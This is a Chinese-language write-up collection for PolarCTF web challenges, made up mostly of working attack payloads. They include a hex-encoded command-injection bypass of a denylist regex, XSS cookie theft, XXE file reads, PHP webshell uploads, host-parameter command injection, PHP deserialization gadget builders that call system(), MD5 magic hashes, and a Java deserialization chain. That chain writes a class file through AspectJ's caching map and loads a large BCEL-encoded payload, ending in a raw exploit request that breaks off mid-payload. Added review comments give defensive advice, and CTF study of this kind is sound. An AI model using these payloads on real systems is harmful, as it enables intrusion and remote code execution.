PolarCTF WEB 题解(04)
ezJson
500 分 5 Polar币
【2024夏季个人挑战赛】
放一放先
CC链
500 分 5 Polar币
【2024夏季个人挑战赛】
放一放先
FastJsonBCEL
500 分 5 Polar币
【2024夏季个人挑战赛】
放一放先
ezJson
500 分 5 Polar币
【2024夏季个人挑战赛】
fastJson反序列化
放一放先。
Dragon
300 分 3 Polar币
flag在cookies里
tnl
300 分 3 Polar币
【2024夏季个人挑战赛】
twothree=php://filter/convert.base64-encode/resource=index
twothree=php://filter/convert.base64-encode/index/resource=flag
你知道sys还能这样玩吗
300 分 3 Polar币
【2024夏季个人挑战赛】
/sys.php
过滤如何绕过:
// Challenge source shown for analysis: the command string is taken unmodified from the POST body.
$cmd = $_POST['cmd'];
// Denylist gate: the command runs only when none of the listed words or characters occurs anywhere in it (case-insensitive, unanchored).
// NOTE(review): a denylist of program names cannot cover every interpreter, quoting form or encoding a shell accepts, so passing this check does not make $cmd safe.
if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget/i', $cmd)) {
// NOTE(review): untrusted input reaches a shell here. A safer design maps a fixed set of allowed actions to fixed commands and passes any variable argument through escapeshellarg().
$output = system($cmd);
// system() already writes the command's output and returns only its last line, so this prints that last line a second time.
echo $output;
}
引号和圆括号没有过滤:
└─# echo "ls"|hex
6c730a
cmd=php -r 'system(hex2bin("6c73"));'
└─# echo "cat /flag.txt"|hex
636174202f666c61672e7478740a
cmd=php -r 'system(hex2bin("636174202f666c61672e7478740a"));'
扫扫看
100 分 1 Polar币
【2024夏季个人挑战赛】
dirsearch -u url
/flag.php
查看输出
debudao
100 分 1 Polar币
【2024夏季个人挑战赛】
<script>alert("aa")</script>
<script>alert(document.cookie)</script>
审计
100 分 1 Polar币
【2024夏季个人挑战赛】
https://blog.csdn.net/2301_81684021/article/details/144907940
//数字
240610708 0e462097431906509019562988736854
314282422 0e990995504821699494520356953734
571579406 0e972379832854295224118025748221
903251147 0e174510503823932942361353209384
1110242161 0e435874558488625891324861198103
1320830526 0e912095958985483346995414060832
1586264293 0e622743671155995737639662718498
2302756269 0e250566888497473798724426794462
2427435592 0e067696952328669732475498472343
2653531602 0e877487522341544758028810610885
3293867441 0e471001201303602543921144570260
3295421201 0e703870333002232681239618856220
3465814713 0e258631645650999664521705537122
3524854780 0e507419062489887827087815735195
3908336290 0e807624498959190415881248245271
4011627063 0e485805687034439905938362701775
4775635065 0e998212089946640967599450361168
4790555361 0e643442214660994430134492464512
5432453531 0e512318699085881630861890526097
5579679820 0e877622011730221803461740184915
5585393579 0e664357355382305805992765337023
6376552501 0e165886706997482187870215578015
7124129977 0e500007361044747804682122060876
7197546197 0e915188576072469101457315675502
7656486157 0e451569119711843337267091732412
找其他开头的:
<?php
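/**
 * Search for a string "<prefix><counter>" whose MD5 hex digest has the form
 * "0e" followed only by decimal digits.
 *
 * Why this matters to a reviewer: PHP's loose comparison (==) treats two
 * numeric-looking strings as numbers, so every "0e<digits>" digest compares
 * equal to every other one. Code that compares digests with === or
 * hash_equals() is not affected by such inputs.
 *
 * The variable sigils and the loop condition of the published listing were lost
 * in extraction ("for (i = 0; ii++)"), which left the trailing "return false"
 * unreachable. The optional bound restores that branch; its default keeps the
 * search effectively unbounded, as in the listing.
 *
 * @param string $prefix      text every candidate starts with
 * @param int    $maxAttempts number of counter values to try before giving up
 * @return string|false the first matching candidate, or false when none was found
 */
function findMD5Collision($prefix, $maxAttempts = PHP_INT_MAX) {
    // Try successive counters appended to the prefix.
    for ($i = 0; $i < $maxAttempts; $i++) {
        // Build one candidate string.
        $candidate = $prefix . $i;
        // Compute its MD5 hex digest.
        $md5 = md5($candidate);
        // An MD5 hex digest is 32 characters long, so "0e" plus 30 digits
        // describes the whole digest even without a trailing anchor.
        if (preg_match("/^0e[0-9]{30}/", $md5)) {
            echo $candidate;
            return $candidate; // first candidate that satisfies the pattern
        }
    }
    return false; // nothing found within $maxAttempts tries
}

$prefix = "ailx10"; // the string is required to start with "ailx10"
$string = findMD5Collision($prefix);
if ($string !== false) {
    echo "找到的字符串: " . $string . "\n";
    echo "MD5 哈希值: " . md5($string) . "\n";
} else {
    echo "未找到符合条件的字符串。\n";
}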
?>
ExX?
300 分 3 Polar币
【2024夏季个人挑战赛】
2.8.0 dom
dirsearch -u url
dom.php
/dom.php
POST:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe[
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php"
>]>
<name>&xxe;</name>
---or----
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///var/www/html/flagggg.php" >]>
<user>
<name>&xxe;</name>
</user>
upload1
100 分 1 Polar币
【2024夏季个人挑战赛】
前端验证扩展名,POST直接提交php木马
pass=system(“cat /flag.txt”);
rapyiquan
100 分 1 Polar币
【2024秋季个人挑战赛】
?c[md=l\s /
?c[md=c\at /fl\ag.php
bllbl_ser1
100 分 1 Polar币
【2024秋季个人挑战赛】
<?php
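// Local stand-ins for the target's classes. The challenge source is not shown on
// this page, so the class and property names are the ones the write-up assumes
// the server-side classes use.
// The "$" sigils of the published listing were lost in extraction and are
// restored here; the serialized output is the one printed below the listing.
//
// NOTE(review): the underlying weakness is unserialize() applied to request
// data, which lets the client choose every property value of the rebuilt
// objects. Servers should exchange JSON instead, or at least call
// unserialize($data, ['allowed_classes' => false]), and never evaluate a
// property as code.
class bllbl
{
    public $qiang; // holds the nested object
}

class bllnbnl
{
    // The trailing ";" after ")" is part of the string; the write-up notes that
    // omitting it causes an error on the target.
    public $er = 'system("ls /");';
}

$a = new bllbl();
$b = new bllnbnl();
$a->qiang = $b;
// Assigning $b->er here instead of in the class body gives the same result.

$payload = serialize($a);
echo "URL编码后的Payload:\n";
echo urlencode($payload) . "\n\n";
echo "原始Payload:\n";
echo $payload;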
?>
output:
URL编码后的Payload:
O%3A5%3A%22bllbl%22%3A1%3A%7Bs%3A5%3A%22qiang%22%3BO%3A7%3A%22bllnbnl%22%3A1%3A%7Bs%3A2%3A%22er%22%3Bs%3A15%3A%22system%28%22ls+%2F%22%29%3B%22%3B%7D%7D
原始Payload:
O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:15:"system("ls /");";}}
?blljl=O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:15:"system("ls /");";}}
?blljl=O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:20:"system("cat /flag");";}}
EZ_Host
300 分 3 Polar币
【2024秋季个人挑战赛】
dirsearch -u url
/flag
or
?host=127.0.0.1;ls
?host=127.0.0.1;cat flag
传马
300 分 3 Polar币
【2024秋季个人挑战赛】
前端验证php不能传,后端传时更改扩展名木马
pass=system(“cat /flag.txt”);
笑傲上传
300 分 3 Polar币
【2024秋季个人挑战赛】
上传一个jpg非木马,然后看到输出里有include.php
/include.php?file=php://filter/convert-base64.encode/resource=/flag.txt
Deserialize
500 分 5 Polar币
【2024秋季个人挑战赛】
/hidden/
/hidden/hidden.php
<?php
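// Local copies of the classes used to build the serialized object graph.
// The "$" sigils of the published listing were lost in extraction and are
// restored here; the output is the payload printed below the listing.
//
// NOTE(review): the security-relevant point is that isAdmin travels inside a
// client-supplied serialized object. A server must take privileges from its own
// session or data store. If a serialized blob has to round-trip through the
// client, it needs a MAC that is verified with hash_equals() before
// unserialize() is called.

// Token receives a "product" property that is not declared on the class. The
// attribute keeps PHP 8.2+ from reporting that as deprecated; older versions
// read the line as a comment.
#[\AllowDynamicProperties]
class Token
{
    public $id;
    public $secret;

    public function __construct($id, $secret)
    {
        $this->id = $id;
        $this->secret = $secret;
    }

    /** Returns a display string containing the token id. */
    public function generateToken()
    {
        return "Token for {$this->id}";
    }
}

class User
{
    public $name;
    public $isAdmin = false;
    public $token;

    public function __construct($name, $isAdmin, Token $token)
    {
        $this->name = $name;
        $this->isAdmin = $isAdmin;
        $this->token = $token;
    }

    /** Returns "<name> is an admin" or "<name> is not an admin". */
    public function getInfo()
    {
        return "{$this->name} is " . ($this->isAdmin ? "an admin" : "not an admin");
    }
}

class Product
{
    public $productName;
    public $price;

    public function __construct($productName, $price)
    {
        $this->productName = $productName;
        $this->price = $price;
    }

    /** Returns a display string with the product name and price. */
    public function displayProduct()
    {
        return "Product: {$this->productName}, Price: {$this->price}";
    }
}

$product = new Product("apple", 1000);
$token = new Token(1, "secret");
// Undeclared property: serialized after the declared ones, as the output shows.
$token->product = $product;
$user = new User("ZHSH", true, $token);

$payload = serialize($user);
echo "URL编码后的Payload:\n";
echo urlencode($payload) . "\n\n";
echo "原始Payload:\n";
echo $payload;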
?>
URL编码后的Payload:
O%3A4%3A%22User%22%3A3%3A%7Bs%3A4%3A%22name%22%3Bs%3A4%3A%22ZHSH%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A1%3Bs%3A5%3A%22token%22%3BO%3A5%3A%22Token%22%3A3%3A%7Bs%3A2%3A%22id%22%3Bi%3A1%3Bs%3A6%3A%22secret%22%3Bs%3A6%3A%22secret%22%3Bs%3A7%3A%22product%22%3BO%3A7%3A%22Product%22%3A2%3A%7Bs%3A11%3A%22productName%22%3Bs%3A5%3A%22apple%22%3Bs%3A5%3A%22price%22%3Bi%3A1000%3B%7D%7D%7D
原始Payload:
O:4:"User":3:{s:4:"name";s:4:"ZHSH";s:7:"isAdmin";b:1;s:5:"token";O:5:"Token":3:{s:2:"id";i:1;s:6:"secret";s:6:"secret";s:7:"product";O:7:"Product":2:{s:11:"productName";s:5:"apple";s:5:"price";i:1000;}}}
序列一下
300 分 3 Polar币
【2024秋季个人挑战赛】
https://www.jyshare.com/compile/1/
<?php
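// Local stand-in for the target's Polar class; the challenge source is not
// shown on this page, so the property names are the ones the write-up assumes.
// The "$" sigils of the published listing were lost in extraction and are
// restored here; the output is the payload printed below the listing.
//
// NOTE(review): a class that uses one property as a function name and another
// as its argument must never be rebuilt from request data. On the server side,
// avoid unserialize() on untrusted input (use JSON, or pass
// ['allowed_classes' => false]) and dispatch only to an allow-list of callables.
class Polar
{
    public $lt = "system";
    public $b = "ls /";
}

$a = new Polar();
$payload = serialize($a);
echo "URL编码后的Payload:\n";
echo urlencode($payload) . "\n\n";
echo "原始Payload:\n";
echo $payload;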
?>
output:
URL编码后的Payload:
O%3A5%3A%22Polar%22%3A2%3A%7Bs%3A2%3A%22lt%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22b%22%3Bs%3A4%3A%22ls+%2F%22%3B%7D
原始Payload:
O:5:"Polar":2:{s:2:"lt";s:6:"system";s:1:"b";s:4:"ls /";}
1ncIud3
100 分 1 Polar币
【2024秋季个人挑战赛】
f14g fla9 f1ag fl4g fl49 f149
/?page=…/./…/./f1a9
SnakeYaml
500 分 5 Polar币
【2024秋季个人挑战赛】 打c3p0二次反序列化回显
fangyifang
一写一个不吱声
500 分 5 Polar币
【2024秋季个人挑战赛】 clesses,你也许需要知道$JAVA_HOME? Java反序列化漏洞+特殊情况下的springboot任意文件写rce
首页源代码中有一个base64编码串,解码后为:
小T在学习JAVA的时候遇到了一个问题:SpringBoot的任意文件写如何才能RCE?
我在服务器某个地方创建了一个文!件!夹!,然后在服务器上部署了这个JAVA项目,小T说这个JAVA项目虽然有反序列化漏洞但是你没链子你怎么打,我不信你能RCE。
那么现在请你来试试,怎么才能RCE让小T不吱声呢?
下载jar
package BOOT-INF.classes.com.polar.ctf.controller;
import com.polar.ctf.bean.UserBean;
import com.polar.ctf.util.Tools;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PostMapping;
/**
 * Decompiled controller from the challenge jar. It exposes POST /read and turns
 * the request's "obj" value back into a Java object.
 *
 * NOTE(review): this is deserialization of untrusted input. Any readObject()
 * logic of any serializable class on the classpath runs while the stream is
 * read, before the cast to UserBean can reject an unexpected type.
 */
@Controller
public class ReadController {
@PostMapping({"/read"})
public UserBean getUserObj(String obj) throws Exception {
// obj arrives as Base64 text from the client; nothing here authenticates or validates it.
byte[] Bytes = Tools.base64Decode(obj);
// Tools.deserialize is not shown on the page; presumably it wraps ObjectInputStream.readObject() - confirm.
// NOTE(review): a safer endpoint accepts a plain data format (e.g. JSON bound to a DTO) or reads through a stream that allow-lists the expected classes.
return (UserBean)Tools.deserialize(Bytes);
}
}
UserBean
/**
 * Custom deserialization hook of UserBean (decompiled from the challenge jar).
 * Reads the serialized fields "obj", "name" and "age" and, when "obj" is present,
 * stores the Base64-decoded "age" in that map under the key "name".
 *
 * NOTE(review): all three values come from the serialized stream, so the caller
 * picks the map implementation, the key and the value of the put() below. With a
 * map subclass whose put() has side effects, this hook hands that side effect to
 * whoever supplies the stream.
 *
 * @param ois stream positioned at this object's serialized fields
 * @throws IOException            if the fields cannot be read
 * @throws ClassNotFoundException if a class named in the stream cannot be resolved
 */
private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
// Read the field values by name; each get() falls back to null when the field is absent.
ObjectInputStream.GetField gf = ois.readFields();
// The generic cast is unchecked: at run time only "is a HashMap" is verified, so a HashMap subclass passes as well.
HashMap<String, byte[]> a = (HashMap<String, byte[]>)gf.get("obj", (Object)null);
String name = (String)gf.get("name", (Object)null);
String age = (String)gf.get("age", (Object)null);
if (a == null) {
this.obj = null;
} else {
try {
// Mutates the deserialized map itself; this branch does not assign this.obj, and name and age are never stored on the bean.
// NOTE(review): checking a.getClass() == HashMap.class before this call would keep subclass-specific put() behaviour out of reach.
a.put(name, Tools.base64Decode(age));
} catch (Exception var7) {
// A decoding or put() failure is only printed; deserialization still completes.
var7.printStackTrace();
}
}
}
存在反序列化利用
pom.xml
<properties>
<!-- JRE FROM openjdk:8u102-jre -->
<!-- JRE FROM openjdk:8u102-jre -->
<!-- JRE FROM openjdk:8u102-jre -->
知道JDK版本,就可以推出docker镜像中的JDK路径,题目作者创建的 JAVA_HOME/classes 目录也就知道了。
EvilEcho.java
//com.sun.org.apache.bcel.internal.util.ClassLoader
// 是 Apache BCEL(Byte Code Engineering Library)的一部分,但需要注意以下几点:
// JDK 版本限制:该 ClassLoader 在 JDK 8u252 及更高版本中已被移除
// 。如果你的 JDK 版本较新,可能无法直接使用。
// example : jdk1.8.0_201
//
/*
rO0ABXNyAAhFdmlsRWNob2turzAL9eh9AgAAeHA=
obj=rO0ABXNyAAhFdmlsRWNob2turzAL9eh9AgAAeHA%3D
*/
import com.sun.org.apache.bcel.internal.util.ClassLoader;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.lang.reflect.Method;
import java.util.Base64;
public class EvilEcho implements Serializable {
/**
 * Serializes one instance of this class and prints the result as Base64 text.
 * The printed value is the short "obj" string shown in the comment above the
 * imports and in the second request of the write-up.
 */
public static void main(String[] args) {
// Not used below; constructing it only confirms that the local JDK still ships this class.
ClassLoader cl = new com.sun.org.apache.bcel.internal.util.ClassLoader();
try {
// The class is looked up and instantiated reflectively by name.
Class<?> evilClass = Class.forName("EvilEcho");
Object evilInstance = evilClass.getDeclaredConstructor().newInstance();
ByteArrayOutputStream btout = new ByteArrayOutputStream();
ObjectOutputStream objOut = new ObjectOutputStream(btout);
// Only the class name and serialVersionUID end up in the stream: the class declares no instance fields.
objOut.writeObject(evilInstance);
System.out.println(new String(Base64.getEncoder().encode(btout.toByteArray())));
//deserialize(btout.toByteArray());
} catch (Exception e) {
e.printStackTrace();
}
}
private void readObject(ObjectInputStream ois) throws Exception {
String code = "BCEL$l$8b$I$A$A$A$A$A$A$A$8dV$5bW$TW$U$fe$8e$q$99a$YD$C$I$f1R$c1k$40M$c4$bb$40$ad$IX$ac$B$adA$v$a2m$87$e1$A$D$93$9983$B$b4$f7$7bko$f6fk$ed$cd$da$d6v$f5$c9$97$e8j$97$ae$3e$f7$a1$7d$e9k$9f$fa$d4$be$f4$l$d4$ee$93I4$R$ace$z$f69g_$ce$de$fb$db$7b$9f$cc$cf$ff$fcp$D$c0V$7c$a7$a0$i$87$U$3c$8c$c3$82$qe$M$u8$82$a32$G$r$3c$a2$40$c2$90$84c$K$86q$5c$c6$J$Z$8f$caxL$c6$e324$n$h$91$a1$cb$Y$95$c0$85$c6$98$8cq$Z$T$K$ML$w$a8$c1$94$MS$ac$v$Z$96$M$5bFZ8$3b$v$c3$91$e0$w$f0$90$RdZ$c1$Mf$V4$e2$94$8c$d3b$7dB$90$te$3c$r$e3i$J$cf$uh$c1$b3$S$9ec$Iu$Y$96$e1$edf$u$8b6$le$It$d9$a3$9c$a1$waX$bc$3f$93$g$e1$ce$806b$S$t$9c$b0u$cd$3c$aa9$868$e7$99$Bo$c2p$ZV$tlg$3c$ceg$b5T$da$e4q$cdMs$dd$9b$9c$e1$da4w$e2$7b$bbz$S$3d$fa$84$dd$ce$mw$e8f$de$d9$82$e9M$M$d5$89ImZ$8b$9b$9a5$k$ef25$d7m$X$82V$86$rE$C$87$8f$99t$5d$bc$8f$7b$T$f6hNc$b3$88$e6$b6$c6$c1$91IR$c8I$b6$I$b2U$90m$82l$Xd$87$m$3b$F$d9Uj$97$f4$i$c3$g$t$bb$b2$e9V$8a$a6fx$3eYpZsZ$v$a4$ba$oa$cf$ac$ce$d3$9ea$5b$q$afLz$9a$3e$d5$a7$a5s$88Py$r$3cO$c5$a5$eaI$e8$s$a0$Z$94$a4$9dqt$be$cf$Q$80U$W$e0$88$89$ebTlDL$c2$L$w$5e$c4K$w$5e$c6$x$M$j$Ee$ccM$L$f7c$8e$96$e23$b63$V$9b$e1$p1$dd$b6$3c$3e$eb$c5$i$7e2$c3$5d$_v$d8_$bb$7cv$afm$8er$ea$81WU$bc$863$M$b5$e3$dc$cbktz$94$ccH$c6$e3T$a9$aa$3b$QW$f1$3a$de$60Xt$t$9a$94$85$8a7$f1$W$c3$9e$ff$hO$92$3b$d3$e6$bcN$xr$b1$b8i$dbr$J$C$e5vd$M$cb$85$e3$d9$98$eb$db$de$be$a3$a0$5cN$ca$83$8e$e1qG$c5$db$o$d25$a5$G$T$9e$97$8e$f5$S$v$f5$ee$h$f6r$8d0$v$c9$ce$af$ab$8a$b3x$87$ea$ae$a7F$Z$q$db$8dY$94$98$84wU$bc$87$f7U$7c$80s$q$i$dc$df$af$e2C$7cD$9d$T$d7I$z$3ebXqw$82$8e$hu$V$e7$f11$f1$E$y$9eiQ$x$e7$5cd$3c$c3$8c$tu$cd$b2D$v$$$a8$f8$E$9f$aa$f8$M$9fK$f8B$c5E$7c$v$K$7e$89n8$de$a9$e2$x$7c$ad$e2$h$e1$w8ff$c4$c5A$dd$b4$zJ$baf$9eVSq$Z$df2$ac$bc$f7$a014$dcmzJ$a0$Y$98p$I$ljI$3d$e38$dc$f2$K$e7$dahs$e2N$zj$f4$3a$C4$dfk$b9$ceI$d8$3e$b8$91$S$f5$o$91$b0$99W$40$c51i$93$e3PA$a3s$c7n$ce$8d$ed$7eA$LY$ec$99$c7fx$8eM$f3$7f$bd$o$n$c3$9a$b6$a7$I$ec$5d$d1$b9O$c9$f0$5cV$f3$7c$PN5$c5$d4$cduSs$f8h$n$b6J$97$7b$9d$ba$ce$5d$d7$f0$9f$c8$e81$f1$ae$W$f7$e0$v$d7$e3$v$7f$y$
O9v$9a$3b$de$v$86$b5$f7$c0$e1$d6$8bT$e1$d9G$d2d$d4$a5$89$B$v$ad$d6$z$rYL$a7fX$E$f0$d2$e2$8b$bb$s4$t$vf$c4$d2y$7b$f31R$Ue$f5$xQ3$b7$92$ed$85$ce$ce$b1$Og$y$cfH$VF$b8p$a8$x1$cb$b3$c90$c0g9$cdM4$3a$cf$bbZlA$Q$I$b4J$5d$e5$99$M$L$c9$d5$7e$x$9d$f1$c8$92k$84Z$7d$c1$9da$c7$8b$Ed$de$Q$9dW$m$d0W3$$$ef$e6$a6$91$S$_$J$c3$ba$bbc$5d$3c$c2$o$J$8b$fa$9d$8aJQ$e4$k$fa$BG$d3$v$e7$c6hsiV$FQ$8f$c9S4K$edh$c2$G$fa$5d$W$7f$L$c0$c43O4N$a78$ad$8c$d6$60$cbU$b0$x9$f1$s$a2$a1$i3$84V$a2$aa$af$80$cd$d8B$abL$l$Uy$e3$F$df$d3$95$V$A$d3$afaA$We$e1$40$W$c1$D$z$e1P$d9uHY$c8$89$f5$8cv$e5Y$u$7dy$85$K_A$z$u$b4$84$x$f3$db$fe$f5$h$f2$bam$81$8d$b7$b6$c1$bc$ddB$b2$LW$f9$aa$8b$daByn$b5$e0$86$D$c4$j$w$L$d7$q$85H$8aH$UDm$q$e4$d3H$a0p$93$i$91$oAR$z$t$d5$3aRU$7eBM$5by$e8$3aQ$r$bc$f8$g$ea$b3h$IG$b2Xr$k$e1$88$ot$oJ$m$bc4y$ZU$e2$b8$yw$5cN4$Y$vOF$e4$y$ee$L$af$u$f6$i$91$fd$cb$7fD$e3$d054E$94$yVf$b1$ea$wV$87$d7d$b16$8bu$c2$e9$a0o$Z$cdg$S$91$f3$e1$e5$f9$cds$f8$97Q$7e$a0$r$8b$f5$83WD$R$d8$Q$3bN$lJe$b9$S9XF$b4$9c$ca$a3$a0$9e$ca$d0$E$f1$9aWb$t$W$a2$LU$e8$c7$o$M$a1$g6$c28C_hgQ$8bs$a8$c3$r$y$G$e5$8b$hh$c0$_$88$e07$y$c1$eft$d7$lX$8e$3f$b1$C$7f$a3$915$a3$89ub$r$h$c2$g$f2$b8$8a$9d$c0j6$82$b5$b9v8M$7eT$d6$87m$d8N$a7z$b6$X$3b$c8$t$p$8b$9d$d8$856j$a0$$$b6$Y$ed$c4$xC$3f$ab$40$H$f1$C$Y$a2$f0$ef$a7$5d$90$e2$f9$L$bbI$g$a2$a8$7e$c5$D$b4$93$u$a6$y$f6$90T$a6$c8$$$a2$T$7b$v$af$h$b8$40ytC$n$efA$f4$60$ly$7b$90$fe$b7$pp$93$C$ae$90$d0$xa$bf$84$87$K$d4$df$f8$fb$D$S$S$40$c5MB$89$60$93$d0$X$a4$I$fbs$ed$7d$f0_g$f9j$k$Y$L$A$A";
//new ClassLoader().loadClass(code).newInstance();
ClassLoader classLoader = (ClassLoader) Class.forName("com.sun.org.apache.bcel.internal.util.ClassLoader").getDeclaredConstructor().newInstance();
// 获取 loadClass 方法
Method loadClassMethod = classLoader.getClass().getMethod("loadClass", String.class);
// 调用 loadClass 方法加载类
Class<?> loadedClass = (Class<?>) loadClassMethod.invoke(classLoader, code);
loadedClass.newInstance();
}
}
Poc.java
package ysoserial.AspetJW;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;
import static com.polar.ctf.util.Tools.base64Encode;
import static com.polar.ctf.util.Tools.serialize;
/**
 * Write-up helper that builds the serialized UserBean sent to POST /read in the
 * "payload write" request, and prints it as Base64.
 *
 * NOTE(review): defensive takeaways from this chain. Keep aspectjweaver off the
 * runtime classpath when the application does not need it, run the service as a
 * user that cannot write below the JRE directory, and alert on new .class files
 * appearing there. The root cause remains the unfiltered deserialization in the
 * /read endpoint.
 */
public class Poc {
/**
 * Assembles the object graph by reflection, serializes it with the application's
 * own Tools helpers and prints the Base64 text.
 */
public static void main(String[] args) throws Exception {
// The (String, int) constructor is opened with setAccessible(true) because it is not reachable normally.
Constructor con = Class.forName("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap").getDeclaredConstructor(String.class, int.class);
con.setAccessible(true);
// Instantiate the map. The write-up relies on its put() storing each value as a file under this folder.
HashMap map = (HashMap) con.newInstance("/usr/lib/jvm/java-8-openjdk-amd64/jre/classes/", 1); // target folder path
Constructor constructor = Class.forName("com.polar.ctf.bean.UserBean").getDeclaredConstructor();
constructor.setAccessible(true);
Object userBean = constructor.newInstance();
Class cls = userBean.getClass();
// "obj" is the map that UserBean.readObject() calls put() on.
Field field = cls.getDeclaredField("obj");
field.setAccessible(true);
field.set(userBean, map);
// "name" becomes the key of that put().
Field field1 = cls.getDeclaredField("name");
field1.setAccessible(true);
field1.set(userBean, "EvilEcho.class"); // file name of the class; must match the class name of the content below
// "age" becomes the Base64 text that readObject() decodes into the value of that put().
Field field2 = cls.getDeclaredField("age");
field2.setAccessible(true);
String payload = "yv66vgAAADQAdAoABgAtCAxxxxxx"; // truncated placeholder for the Base64 class content; replaced below when the file can be read
try{
// Author's local build output; the path is specific to the author's machine.
byte[] bytes = Files.readAllBytes(Paths.get("D:\\ctf\\workspace\\javaprj\\ysoserial\\target\\classes\\EvilEcho.class"));
payload = Base64.getEncoder().encodeToString(bytes);
}catch (IOException e){
// If the file is missing, the placeholder above is serialized instead and the result is not a valid class file.
e.printStackTrace();
}
field2.set(userBean, payload);
byte[] bytes = serialize(userBean);
System.out.println(base64Encode(bytes));
}
}
payload write
/read
POST /read HTTP/1.1
Host: 3343ac18-60e3-4ca5-9980-6d772062605f.www.polarctf.com:8090
Content-Length: 11370
Pragma: no-cache
Cache-Control: no-cache
Origin: http://3343ac18-60e3-4ca5-9980-6d772062605f.www.polarctf.com:8090
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://3343ac18-60e3-4ca5-9980-6d772062605f.www.polarctf.com:8090/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
obj=rO0ABXNyABtjb20ucG9sYXIuY3RmLmJlYW4uVXNlckJlYW7R%2BjMfv6DhngIAA0wAA2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABG5hbWVxAH4AAUwAA29ianQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdB%2FAeXY2NnZnQUFBRFFBa2dvQUNBQkxCd0JNQ2dBQ0FFc0lBRTBLQUFZQVRnY0FUd29BQmdCUUJ3QlJDZ0JTQUZNSEFGUUtBQW9BU3djQVZRb0FEQUJXQ2dBTUFGY0pBRmdBV1FjQVdnb0FXd0JjQ2dBS0FGMEtBRjRBWHdvQUVBQmdDZ0JoQUdJSEFHTUtBQllBWkFnQVpRZ0FaZ29BQ0FCbkNBQm9DZ0FHQUdrS0FHb0Fhd29BQmdCc0J3Qk5Cd0J0QVFBR1BHbHVhWFErQVFBREtDbFdBUUFFUTI5a1pRRUFEMHhwYm1WT2RXMWlaWEpVWVdKc1pRRUFFa3h2WTJGc1ZtRnlhV0ZpYkdWVVlXSnNaUUVBQkhSb2FYTUJBQXBNUlhacGJFVmphRzg3QVFBRWJXRnBiZ0VBRmloYlRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tWWUJBQWxsZG1sc1EyeGhjM01CQUJGTWFtRjJZUzlzWVc1bkwwTnNZWE56T3dFQURHVjJhV3hKYm5OMFlXNWpaUUVBRWt4cVlYWmhMMnhoYm1jdlQySnFaV04wT3dFQUJXSjBiM1YwQVFBZlRHcGhkbUV2YVc4dlFubDBaVUZ5Y21GNVQzVjBjSFYwVTNSeVpXRnRPd0VBQm05aWFrOTFkQUVBSEV4cVlYWmhMMmx2TDA5aWFtVmpkRTkxZEhCMWRGTjBjbVZoYlRzQkFBRmxBUUFWVEdwaGRtRXZiR0Z1Wnk5RmVHTmxjSFJwYjI0N0FRQUVZWEpuY3dFQUUxdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c0JBQUpqYkFFQU0weGpiMjB2YzNWdUwyOXlaeTloY0dGamFHVXZZbU5sYkM5cGJuUmxjbTVoYkM5MWRHbHNMME5zWVhOelRHOWhaR1Z5T3dFQUZreHZZMkZzVm1GeWFXRmliR1ZVZVhCbFZHRmliR1VCQUJSTWFtRjJZUzlzWVc1bkwwTnNZWE56UENvK093RUFEVk4wWVdOclRXRndWR0ZpYkdVSEFEVUhBRXdIQUdNQkFBcHlaV0ZrVDJKcVpXTjBBUUFlS0V4cVlYWmhMMmx2TDA5aWFtVmpkRWx1Y0hWMFUzUnlaV0Z0T3lsV0FRQURiMmx6QVFBYlRHcGhkbUV2YVc4dlQySnFaV04wU1c1d2RYUlRkSEpsWVcwN0FRQUVZMjlrWlFFQUVreHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk93RUFDMk5zWVhOelRHOWhaR1Z5QVFBUGJHOWhaRU5zWVhOelRXVjBhRzlrQVFBYVRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwMWxkR2h2WkRzQkFBdHNiMkZrWldSRGJHRnpjd0VBQ2tWNFkyVndkR2x2Ym5NQkFBcFRiM1Z5WTJWR2FXeGxBUUFOUlhacGJFVmphRzh1YW1GMllRd0FJUUFpQVFBeFkyOXRMM04xYmk5dmNtY3ZZWEJoWTJobEwySmpaV3d2YVc1MFpYSnVZV3d2ZFhScGJDOURiR0Z6YzB4dllXUmxjZ0VBQ0VWMmFXeEZZMmh2REFCdUFHOEJBQTlxWVhaaEwyeGhibWN2UTJ4aGMzTU1BSEFBY1FFQUVHcGhkbUV2YkdGdVp5OVBZbXBsWTNRSEFISU1BSE1BZEFFQUhXcGhkbUV2YVc4dlFubDBaVUZ5Y21GNVQzVjBjSFYwVTNSeVpXRnRBUUFhYW1GMllTOXB